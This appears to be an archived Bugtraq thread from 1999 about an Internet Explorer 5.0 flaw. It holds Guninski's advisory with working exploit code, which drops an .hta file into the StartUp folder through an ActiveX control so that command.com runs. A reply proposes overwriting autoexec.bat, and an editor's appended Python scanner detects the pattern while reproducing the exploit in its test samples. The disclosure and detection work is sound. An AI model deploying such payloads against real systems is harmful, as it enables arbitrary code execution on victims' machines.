Bugtraq mailing list archives

Re: IE 5.0 allows executing programs


From: Eric.Stevens () RP-RORER COM (STEVENS, Eric)
Date: Mon, 23 Aug 1999 07:42:04 -0400


This would probably work on NT machines if in the code the path referenced
pointed at the startup directory of an existing NT profile.  Unfortunately
it's impossible to guess the username of the currently logged on user, and
if you go with something "safe" (i.e. relatively likely to exist) like the
AllUsers profile, you should get blocked from doing that if permissions are
set right on NTFS (if the WINSYS drive is NTFS).  I got a JavaScript error
when I tried Georgi's code since the path
"C:\Windows\Start Menu\Programs\Startup\" does not exist.  Also this is weakened if in 95/98
the user does not use the same profile for all users logged on to the
network.  Although it does still write the file in a dangerous place, since
it will be executed or whatever if the default user profile logs on.

This only reaffirms my opinion that anyone who wishes to do something simple
when setting up a machine the first time to greatly protect themselves
should simply change the name of their windows directory.

Also, I don't know fully how pervasive this exploit is, but if it is capable
of creating .bat files, interesting things may be thought to happen if
instead of the path written in the exploit, one were to instead overwrite
c:\autoexec.bat.  C:\ is a pretty safe path to guess.

_____ ,----+ _________________________________ + _____
____ /      __________ eric stevens ___________ \ ____
___ /--+   _____ eric.stevens () rp-rorer com _____ \ ___
__ /      ____ rpr graphics asp design team _____ \ __
_ `----+ x-eric-conspiracy: there is no conspiracy + _

-----Original Message-----
From: Georgi Guninski [mailto:joro () NAT BG]
Sent: Saturday, August 21, 1999 12:17 PM
To: BUGTRAQ () SECURITYFOCUS COM
Subject: IE 5.0 allows executing programs

Disclaimer:
The opinions expressed in this advisory and program are my own and not
of any company.
The usual standard disclaimer applies, especially the fact that Georgi Guninski
is not liable for any damages caused by direct or indirect use of the
information or functionality provided by this program.
Georgi Guninski bears NO responsibility for content or misuse of this
program or any derivatives thereof.

Description:

Internet Explorer 5.0 under Windows 95/98 (do not know about NT)
allows executing arbitrary programs on the local machine by creating and
overwriting local files and putting content in them.

Details:

The problem is the ActiveX Control "Object for constructing type
libraries for scriptlets".
It allows creating and overwriting local files and, moreover, putting content
in them.
There is some unneeded information in the file, but part of the content
may be chosen.
So, an HTML Application file may be created, fed with exploit
information and written to the StartUp folder.
The next time the user reboots (which may be forced), the code in the
HTML Application file will be executed.
This vulnerability can be exploited via email.

Demonstration is available at: http://www.nat.bg/~joro/scrtlb.html

Workaround:
Disable Active Scripting
or
Disable Run ActiveX Controls and plug-ins

The code is:

<object id="scr"
   classid="clsid:06290BD5-48AA-11D2-8432-006008C3FBFC">
</object>
<SCRIPT>
// Scriptlet.TypeLib: Path selects the output file, Doc its (partial)
// content, write() creates or overwrites the file.
scr.Reset();
scr.Path="C:\\windows\\Start Menu\\Programs\\StartUp\\guninski.hta";
// The dropped .hta instantiates the WSH Shell object and runs command.com
// when Windows launches it from the StartUp folder; "</"+"SCRIPT>" keeps
// the inner tag from closing the outer script block.
scr.Doc="<object id='wsh' classid='clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B'></object><SCRIPT>alert('Written by Georgi Guninski http://www.nat.bg/~joro');wsh.Run('c:\\command.com');</"+"SCRIPT>";
scr.write();
</SCRIPT>

Regards,
Georgi Guninski
http://www.nat.bg/~joro
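
As an added example (editor's code, not part of either message above): a small
Python scanner that a mail gateway or proxy could run over inbound HTML to flag
the pattern the two messages describe: the Scriptlet.TypeLib control
instantiated by CLSID, a .Path pointing at a StartUp folder, the Windows
directory or c:\autoexec.bat, and a .write() call. All three samples are
constructed here: the first is the advisory's snippet with the alert() trimmed,
the second is the c:\autoexec.bat variant Eric Stevens suggests (an assumption,
not something the thread tested), the third is an ordinary page. The list of
sensitive target paths is the editor's reading of the thread, not anything the
advisory enumerates.

```python
import re

# CLSIDs named in Guninski's advisory: the Scriptlet.TypeLib control that does
# the file write, and the WSH Shell object the dropped .hta uses to run a program.
SCRIPTLET_TYPELIB_CLSID = "06290BD5-48AA-11D2-8432-006008C3FBFC"
WSH_SHELL_CLSID = "F935DC22-1CF0-11D0-ADB9-00C04FD58A0B"

OBJECT_RE = re.compile(r"<object\b[^>]*classid\s*=\s*['\"]?clsid:([0-9a-f-]{36})", re.I)
PATH_RE = re.compile(r"\.Path\s*=\s*(['\"])(.*?)\1", re.I | re.S)
WRITE_RE = re.compile(r"\.write\s*\(", re.I)   # also hits document.write(); never used alone
RUN_RE = re.compile(r"\.Run\s*\(", re.I)

# Drop locations discussed in the thread (editor's assumption), matched
# case-insensitively against the unescaped Path: any profile's StartUp folder
# (Win9x, NT user profiles, All Users), autoexec.bat in a drive root, and
# anything under the Windows/WinNT directory.
SENSITIVE_TARGETS = (
    r"\\start menu\\programs\\startup\\",
    r"^[a-z]:\\autoexec\.bat$",
    r"^[a-z]:\\win(dows|nt)\\",
)


def js_unescape(s):
    # "C:\\windows" inside a JS string literal is the path C:\windows. This only
    # collapses backslash escapes; named escapes such as \n are not interpreted.
    return re.sub(r"\\(.)", r"\1", s)


def scan(html):
    """Return which controls the page instantiates, where it writes, and a verdict."""
    clsids = {m.group(1).upper() for m in OBJECT_RE.finditer(html)}
    paths = [js_unescape(m.group(2)) for m in PATH_RE.finditer(html)]
    hits = [p for p in paths
            if any(re.search(pat, p, re.I) for pat in SENSITIVE_TARGETS)]
    uses_typelib = SCRIPTLET_TYPELIB_CLSID in clsids
    writes = bool(WRITE_RE.search(html))
    if uses_typelib and writes and hits:
        verdict = "exploit"      # control loaded, write() called, target is a drop location
    elif uses_typelib or hits:
        verdict = "suspicious"   # control alone, or a sensitive path without the write
    else:
        verdict = "clean"
    return {
        "clsids": sorted(clsids),
        "paths": paths,
        "sensitive_paths": hits,
        "writes_file": writes,
        "wsh_shell": WSH_SHELL_CLSID in clsids,
        "runs_program": bool(RUN_RE.search(html)),
        "verdict": verdict,
    }


# Constructed samples. EXPLOIT is the advisory's snippet with the alert() trimmed;
# AUTOEXEC_VARIANT is the c:\autoexec.bat idea from Eric Stevens's reply, written
# here as an assumption (the thread does not test it); BENIGN is an ordinary page.
EXPLOIT = r"""
<object id="scr" classid="clsid:06290BD5-48AA-11D2-8432-006008C3FBFC"></object>
<SCRIPT>
scr.Reset();
scr.Path="C:\\windows\\Start Menu\\Programs\\StartUp\\guninski.hta";
scr.Doc="<object id='wsh' classid='clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B'></object><SCRIPT>wsh.Run('c:\\command.com');</"+"SCRIPT>";
scr.write();
</SCRIPT>
"""

AUTOEXEC_VARIANT = r"""
<object id="scr" classid="clsid:06290BD5-48AA-11D2-8432-006008C3FBFC"></object>
<script>
scr.Reset();
scr.Path="C:\\autoexec.bat";
scr.Doc="@echo off\r\nc:\\command.com";
scr.write();
</script>
"""

BENIGN = r"""
<html><body><script>document.write("<p>hello</p>");</script></body></html>
"""

if __name__ == "__main__":
    for name, sample in (("advisory exploit", EXPLOIT),
                         ("autoexec variant", AUTOEXEC_VARIANT),
                         ("benign page", BENIGN)):
        r = scan(sample)
        print(f"{name}: {r['verdict']}  paths={r['paths']}")
```

The verdict deliberately requires the CLSID, the write and a sensitive target
together; document.write() on its own, or a StartUp path mentioned in prose,
only raises "suspicious" or nothing. An NT path such as
C:\WINNT\Profiles\All Users\Start Menu\Programs\Startup\x.hta is caught by the
same StartUp pattern, which is the case Eric raises for NT.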

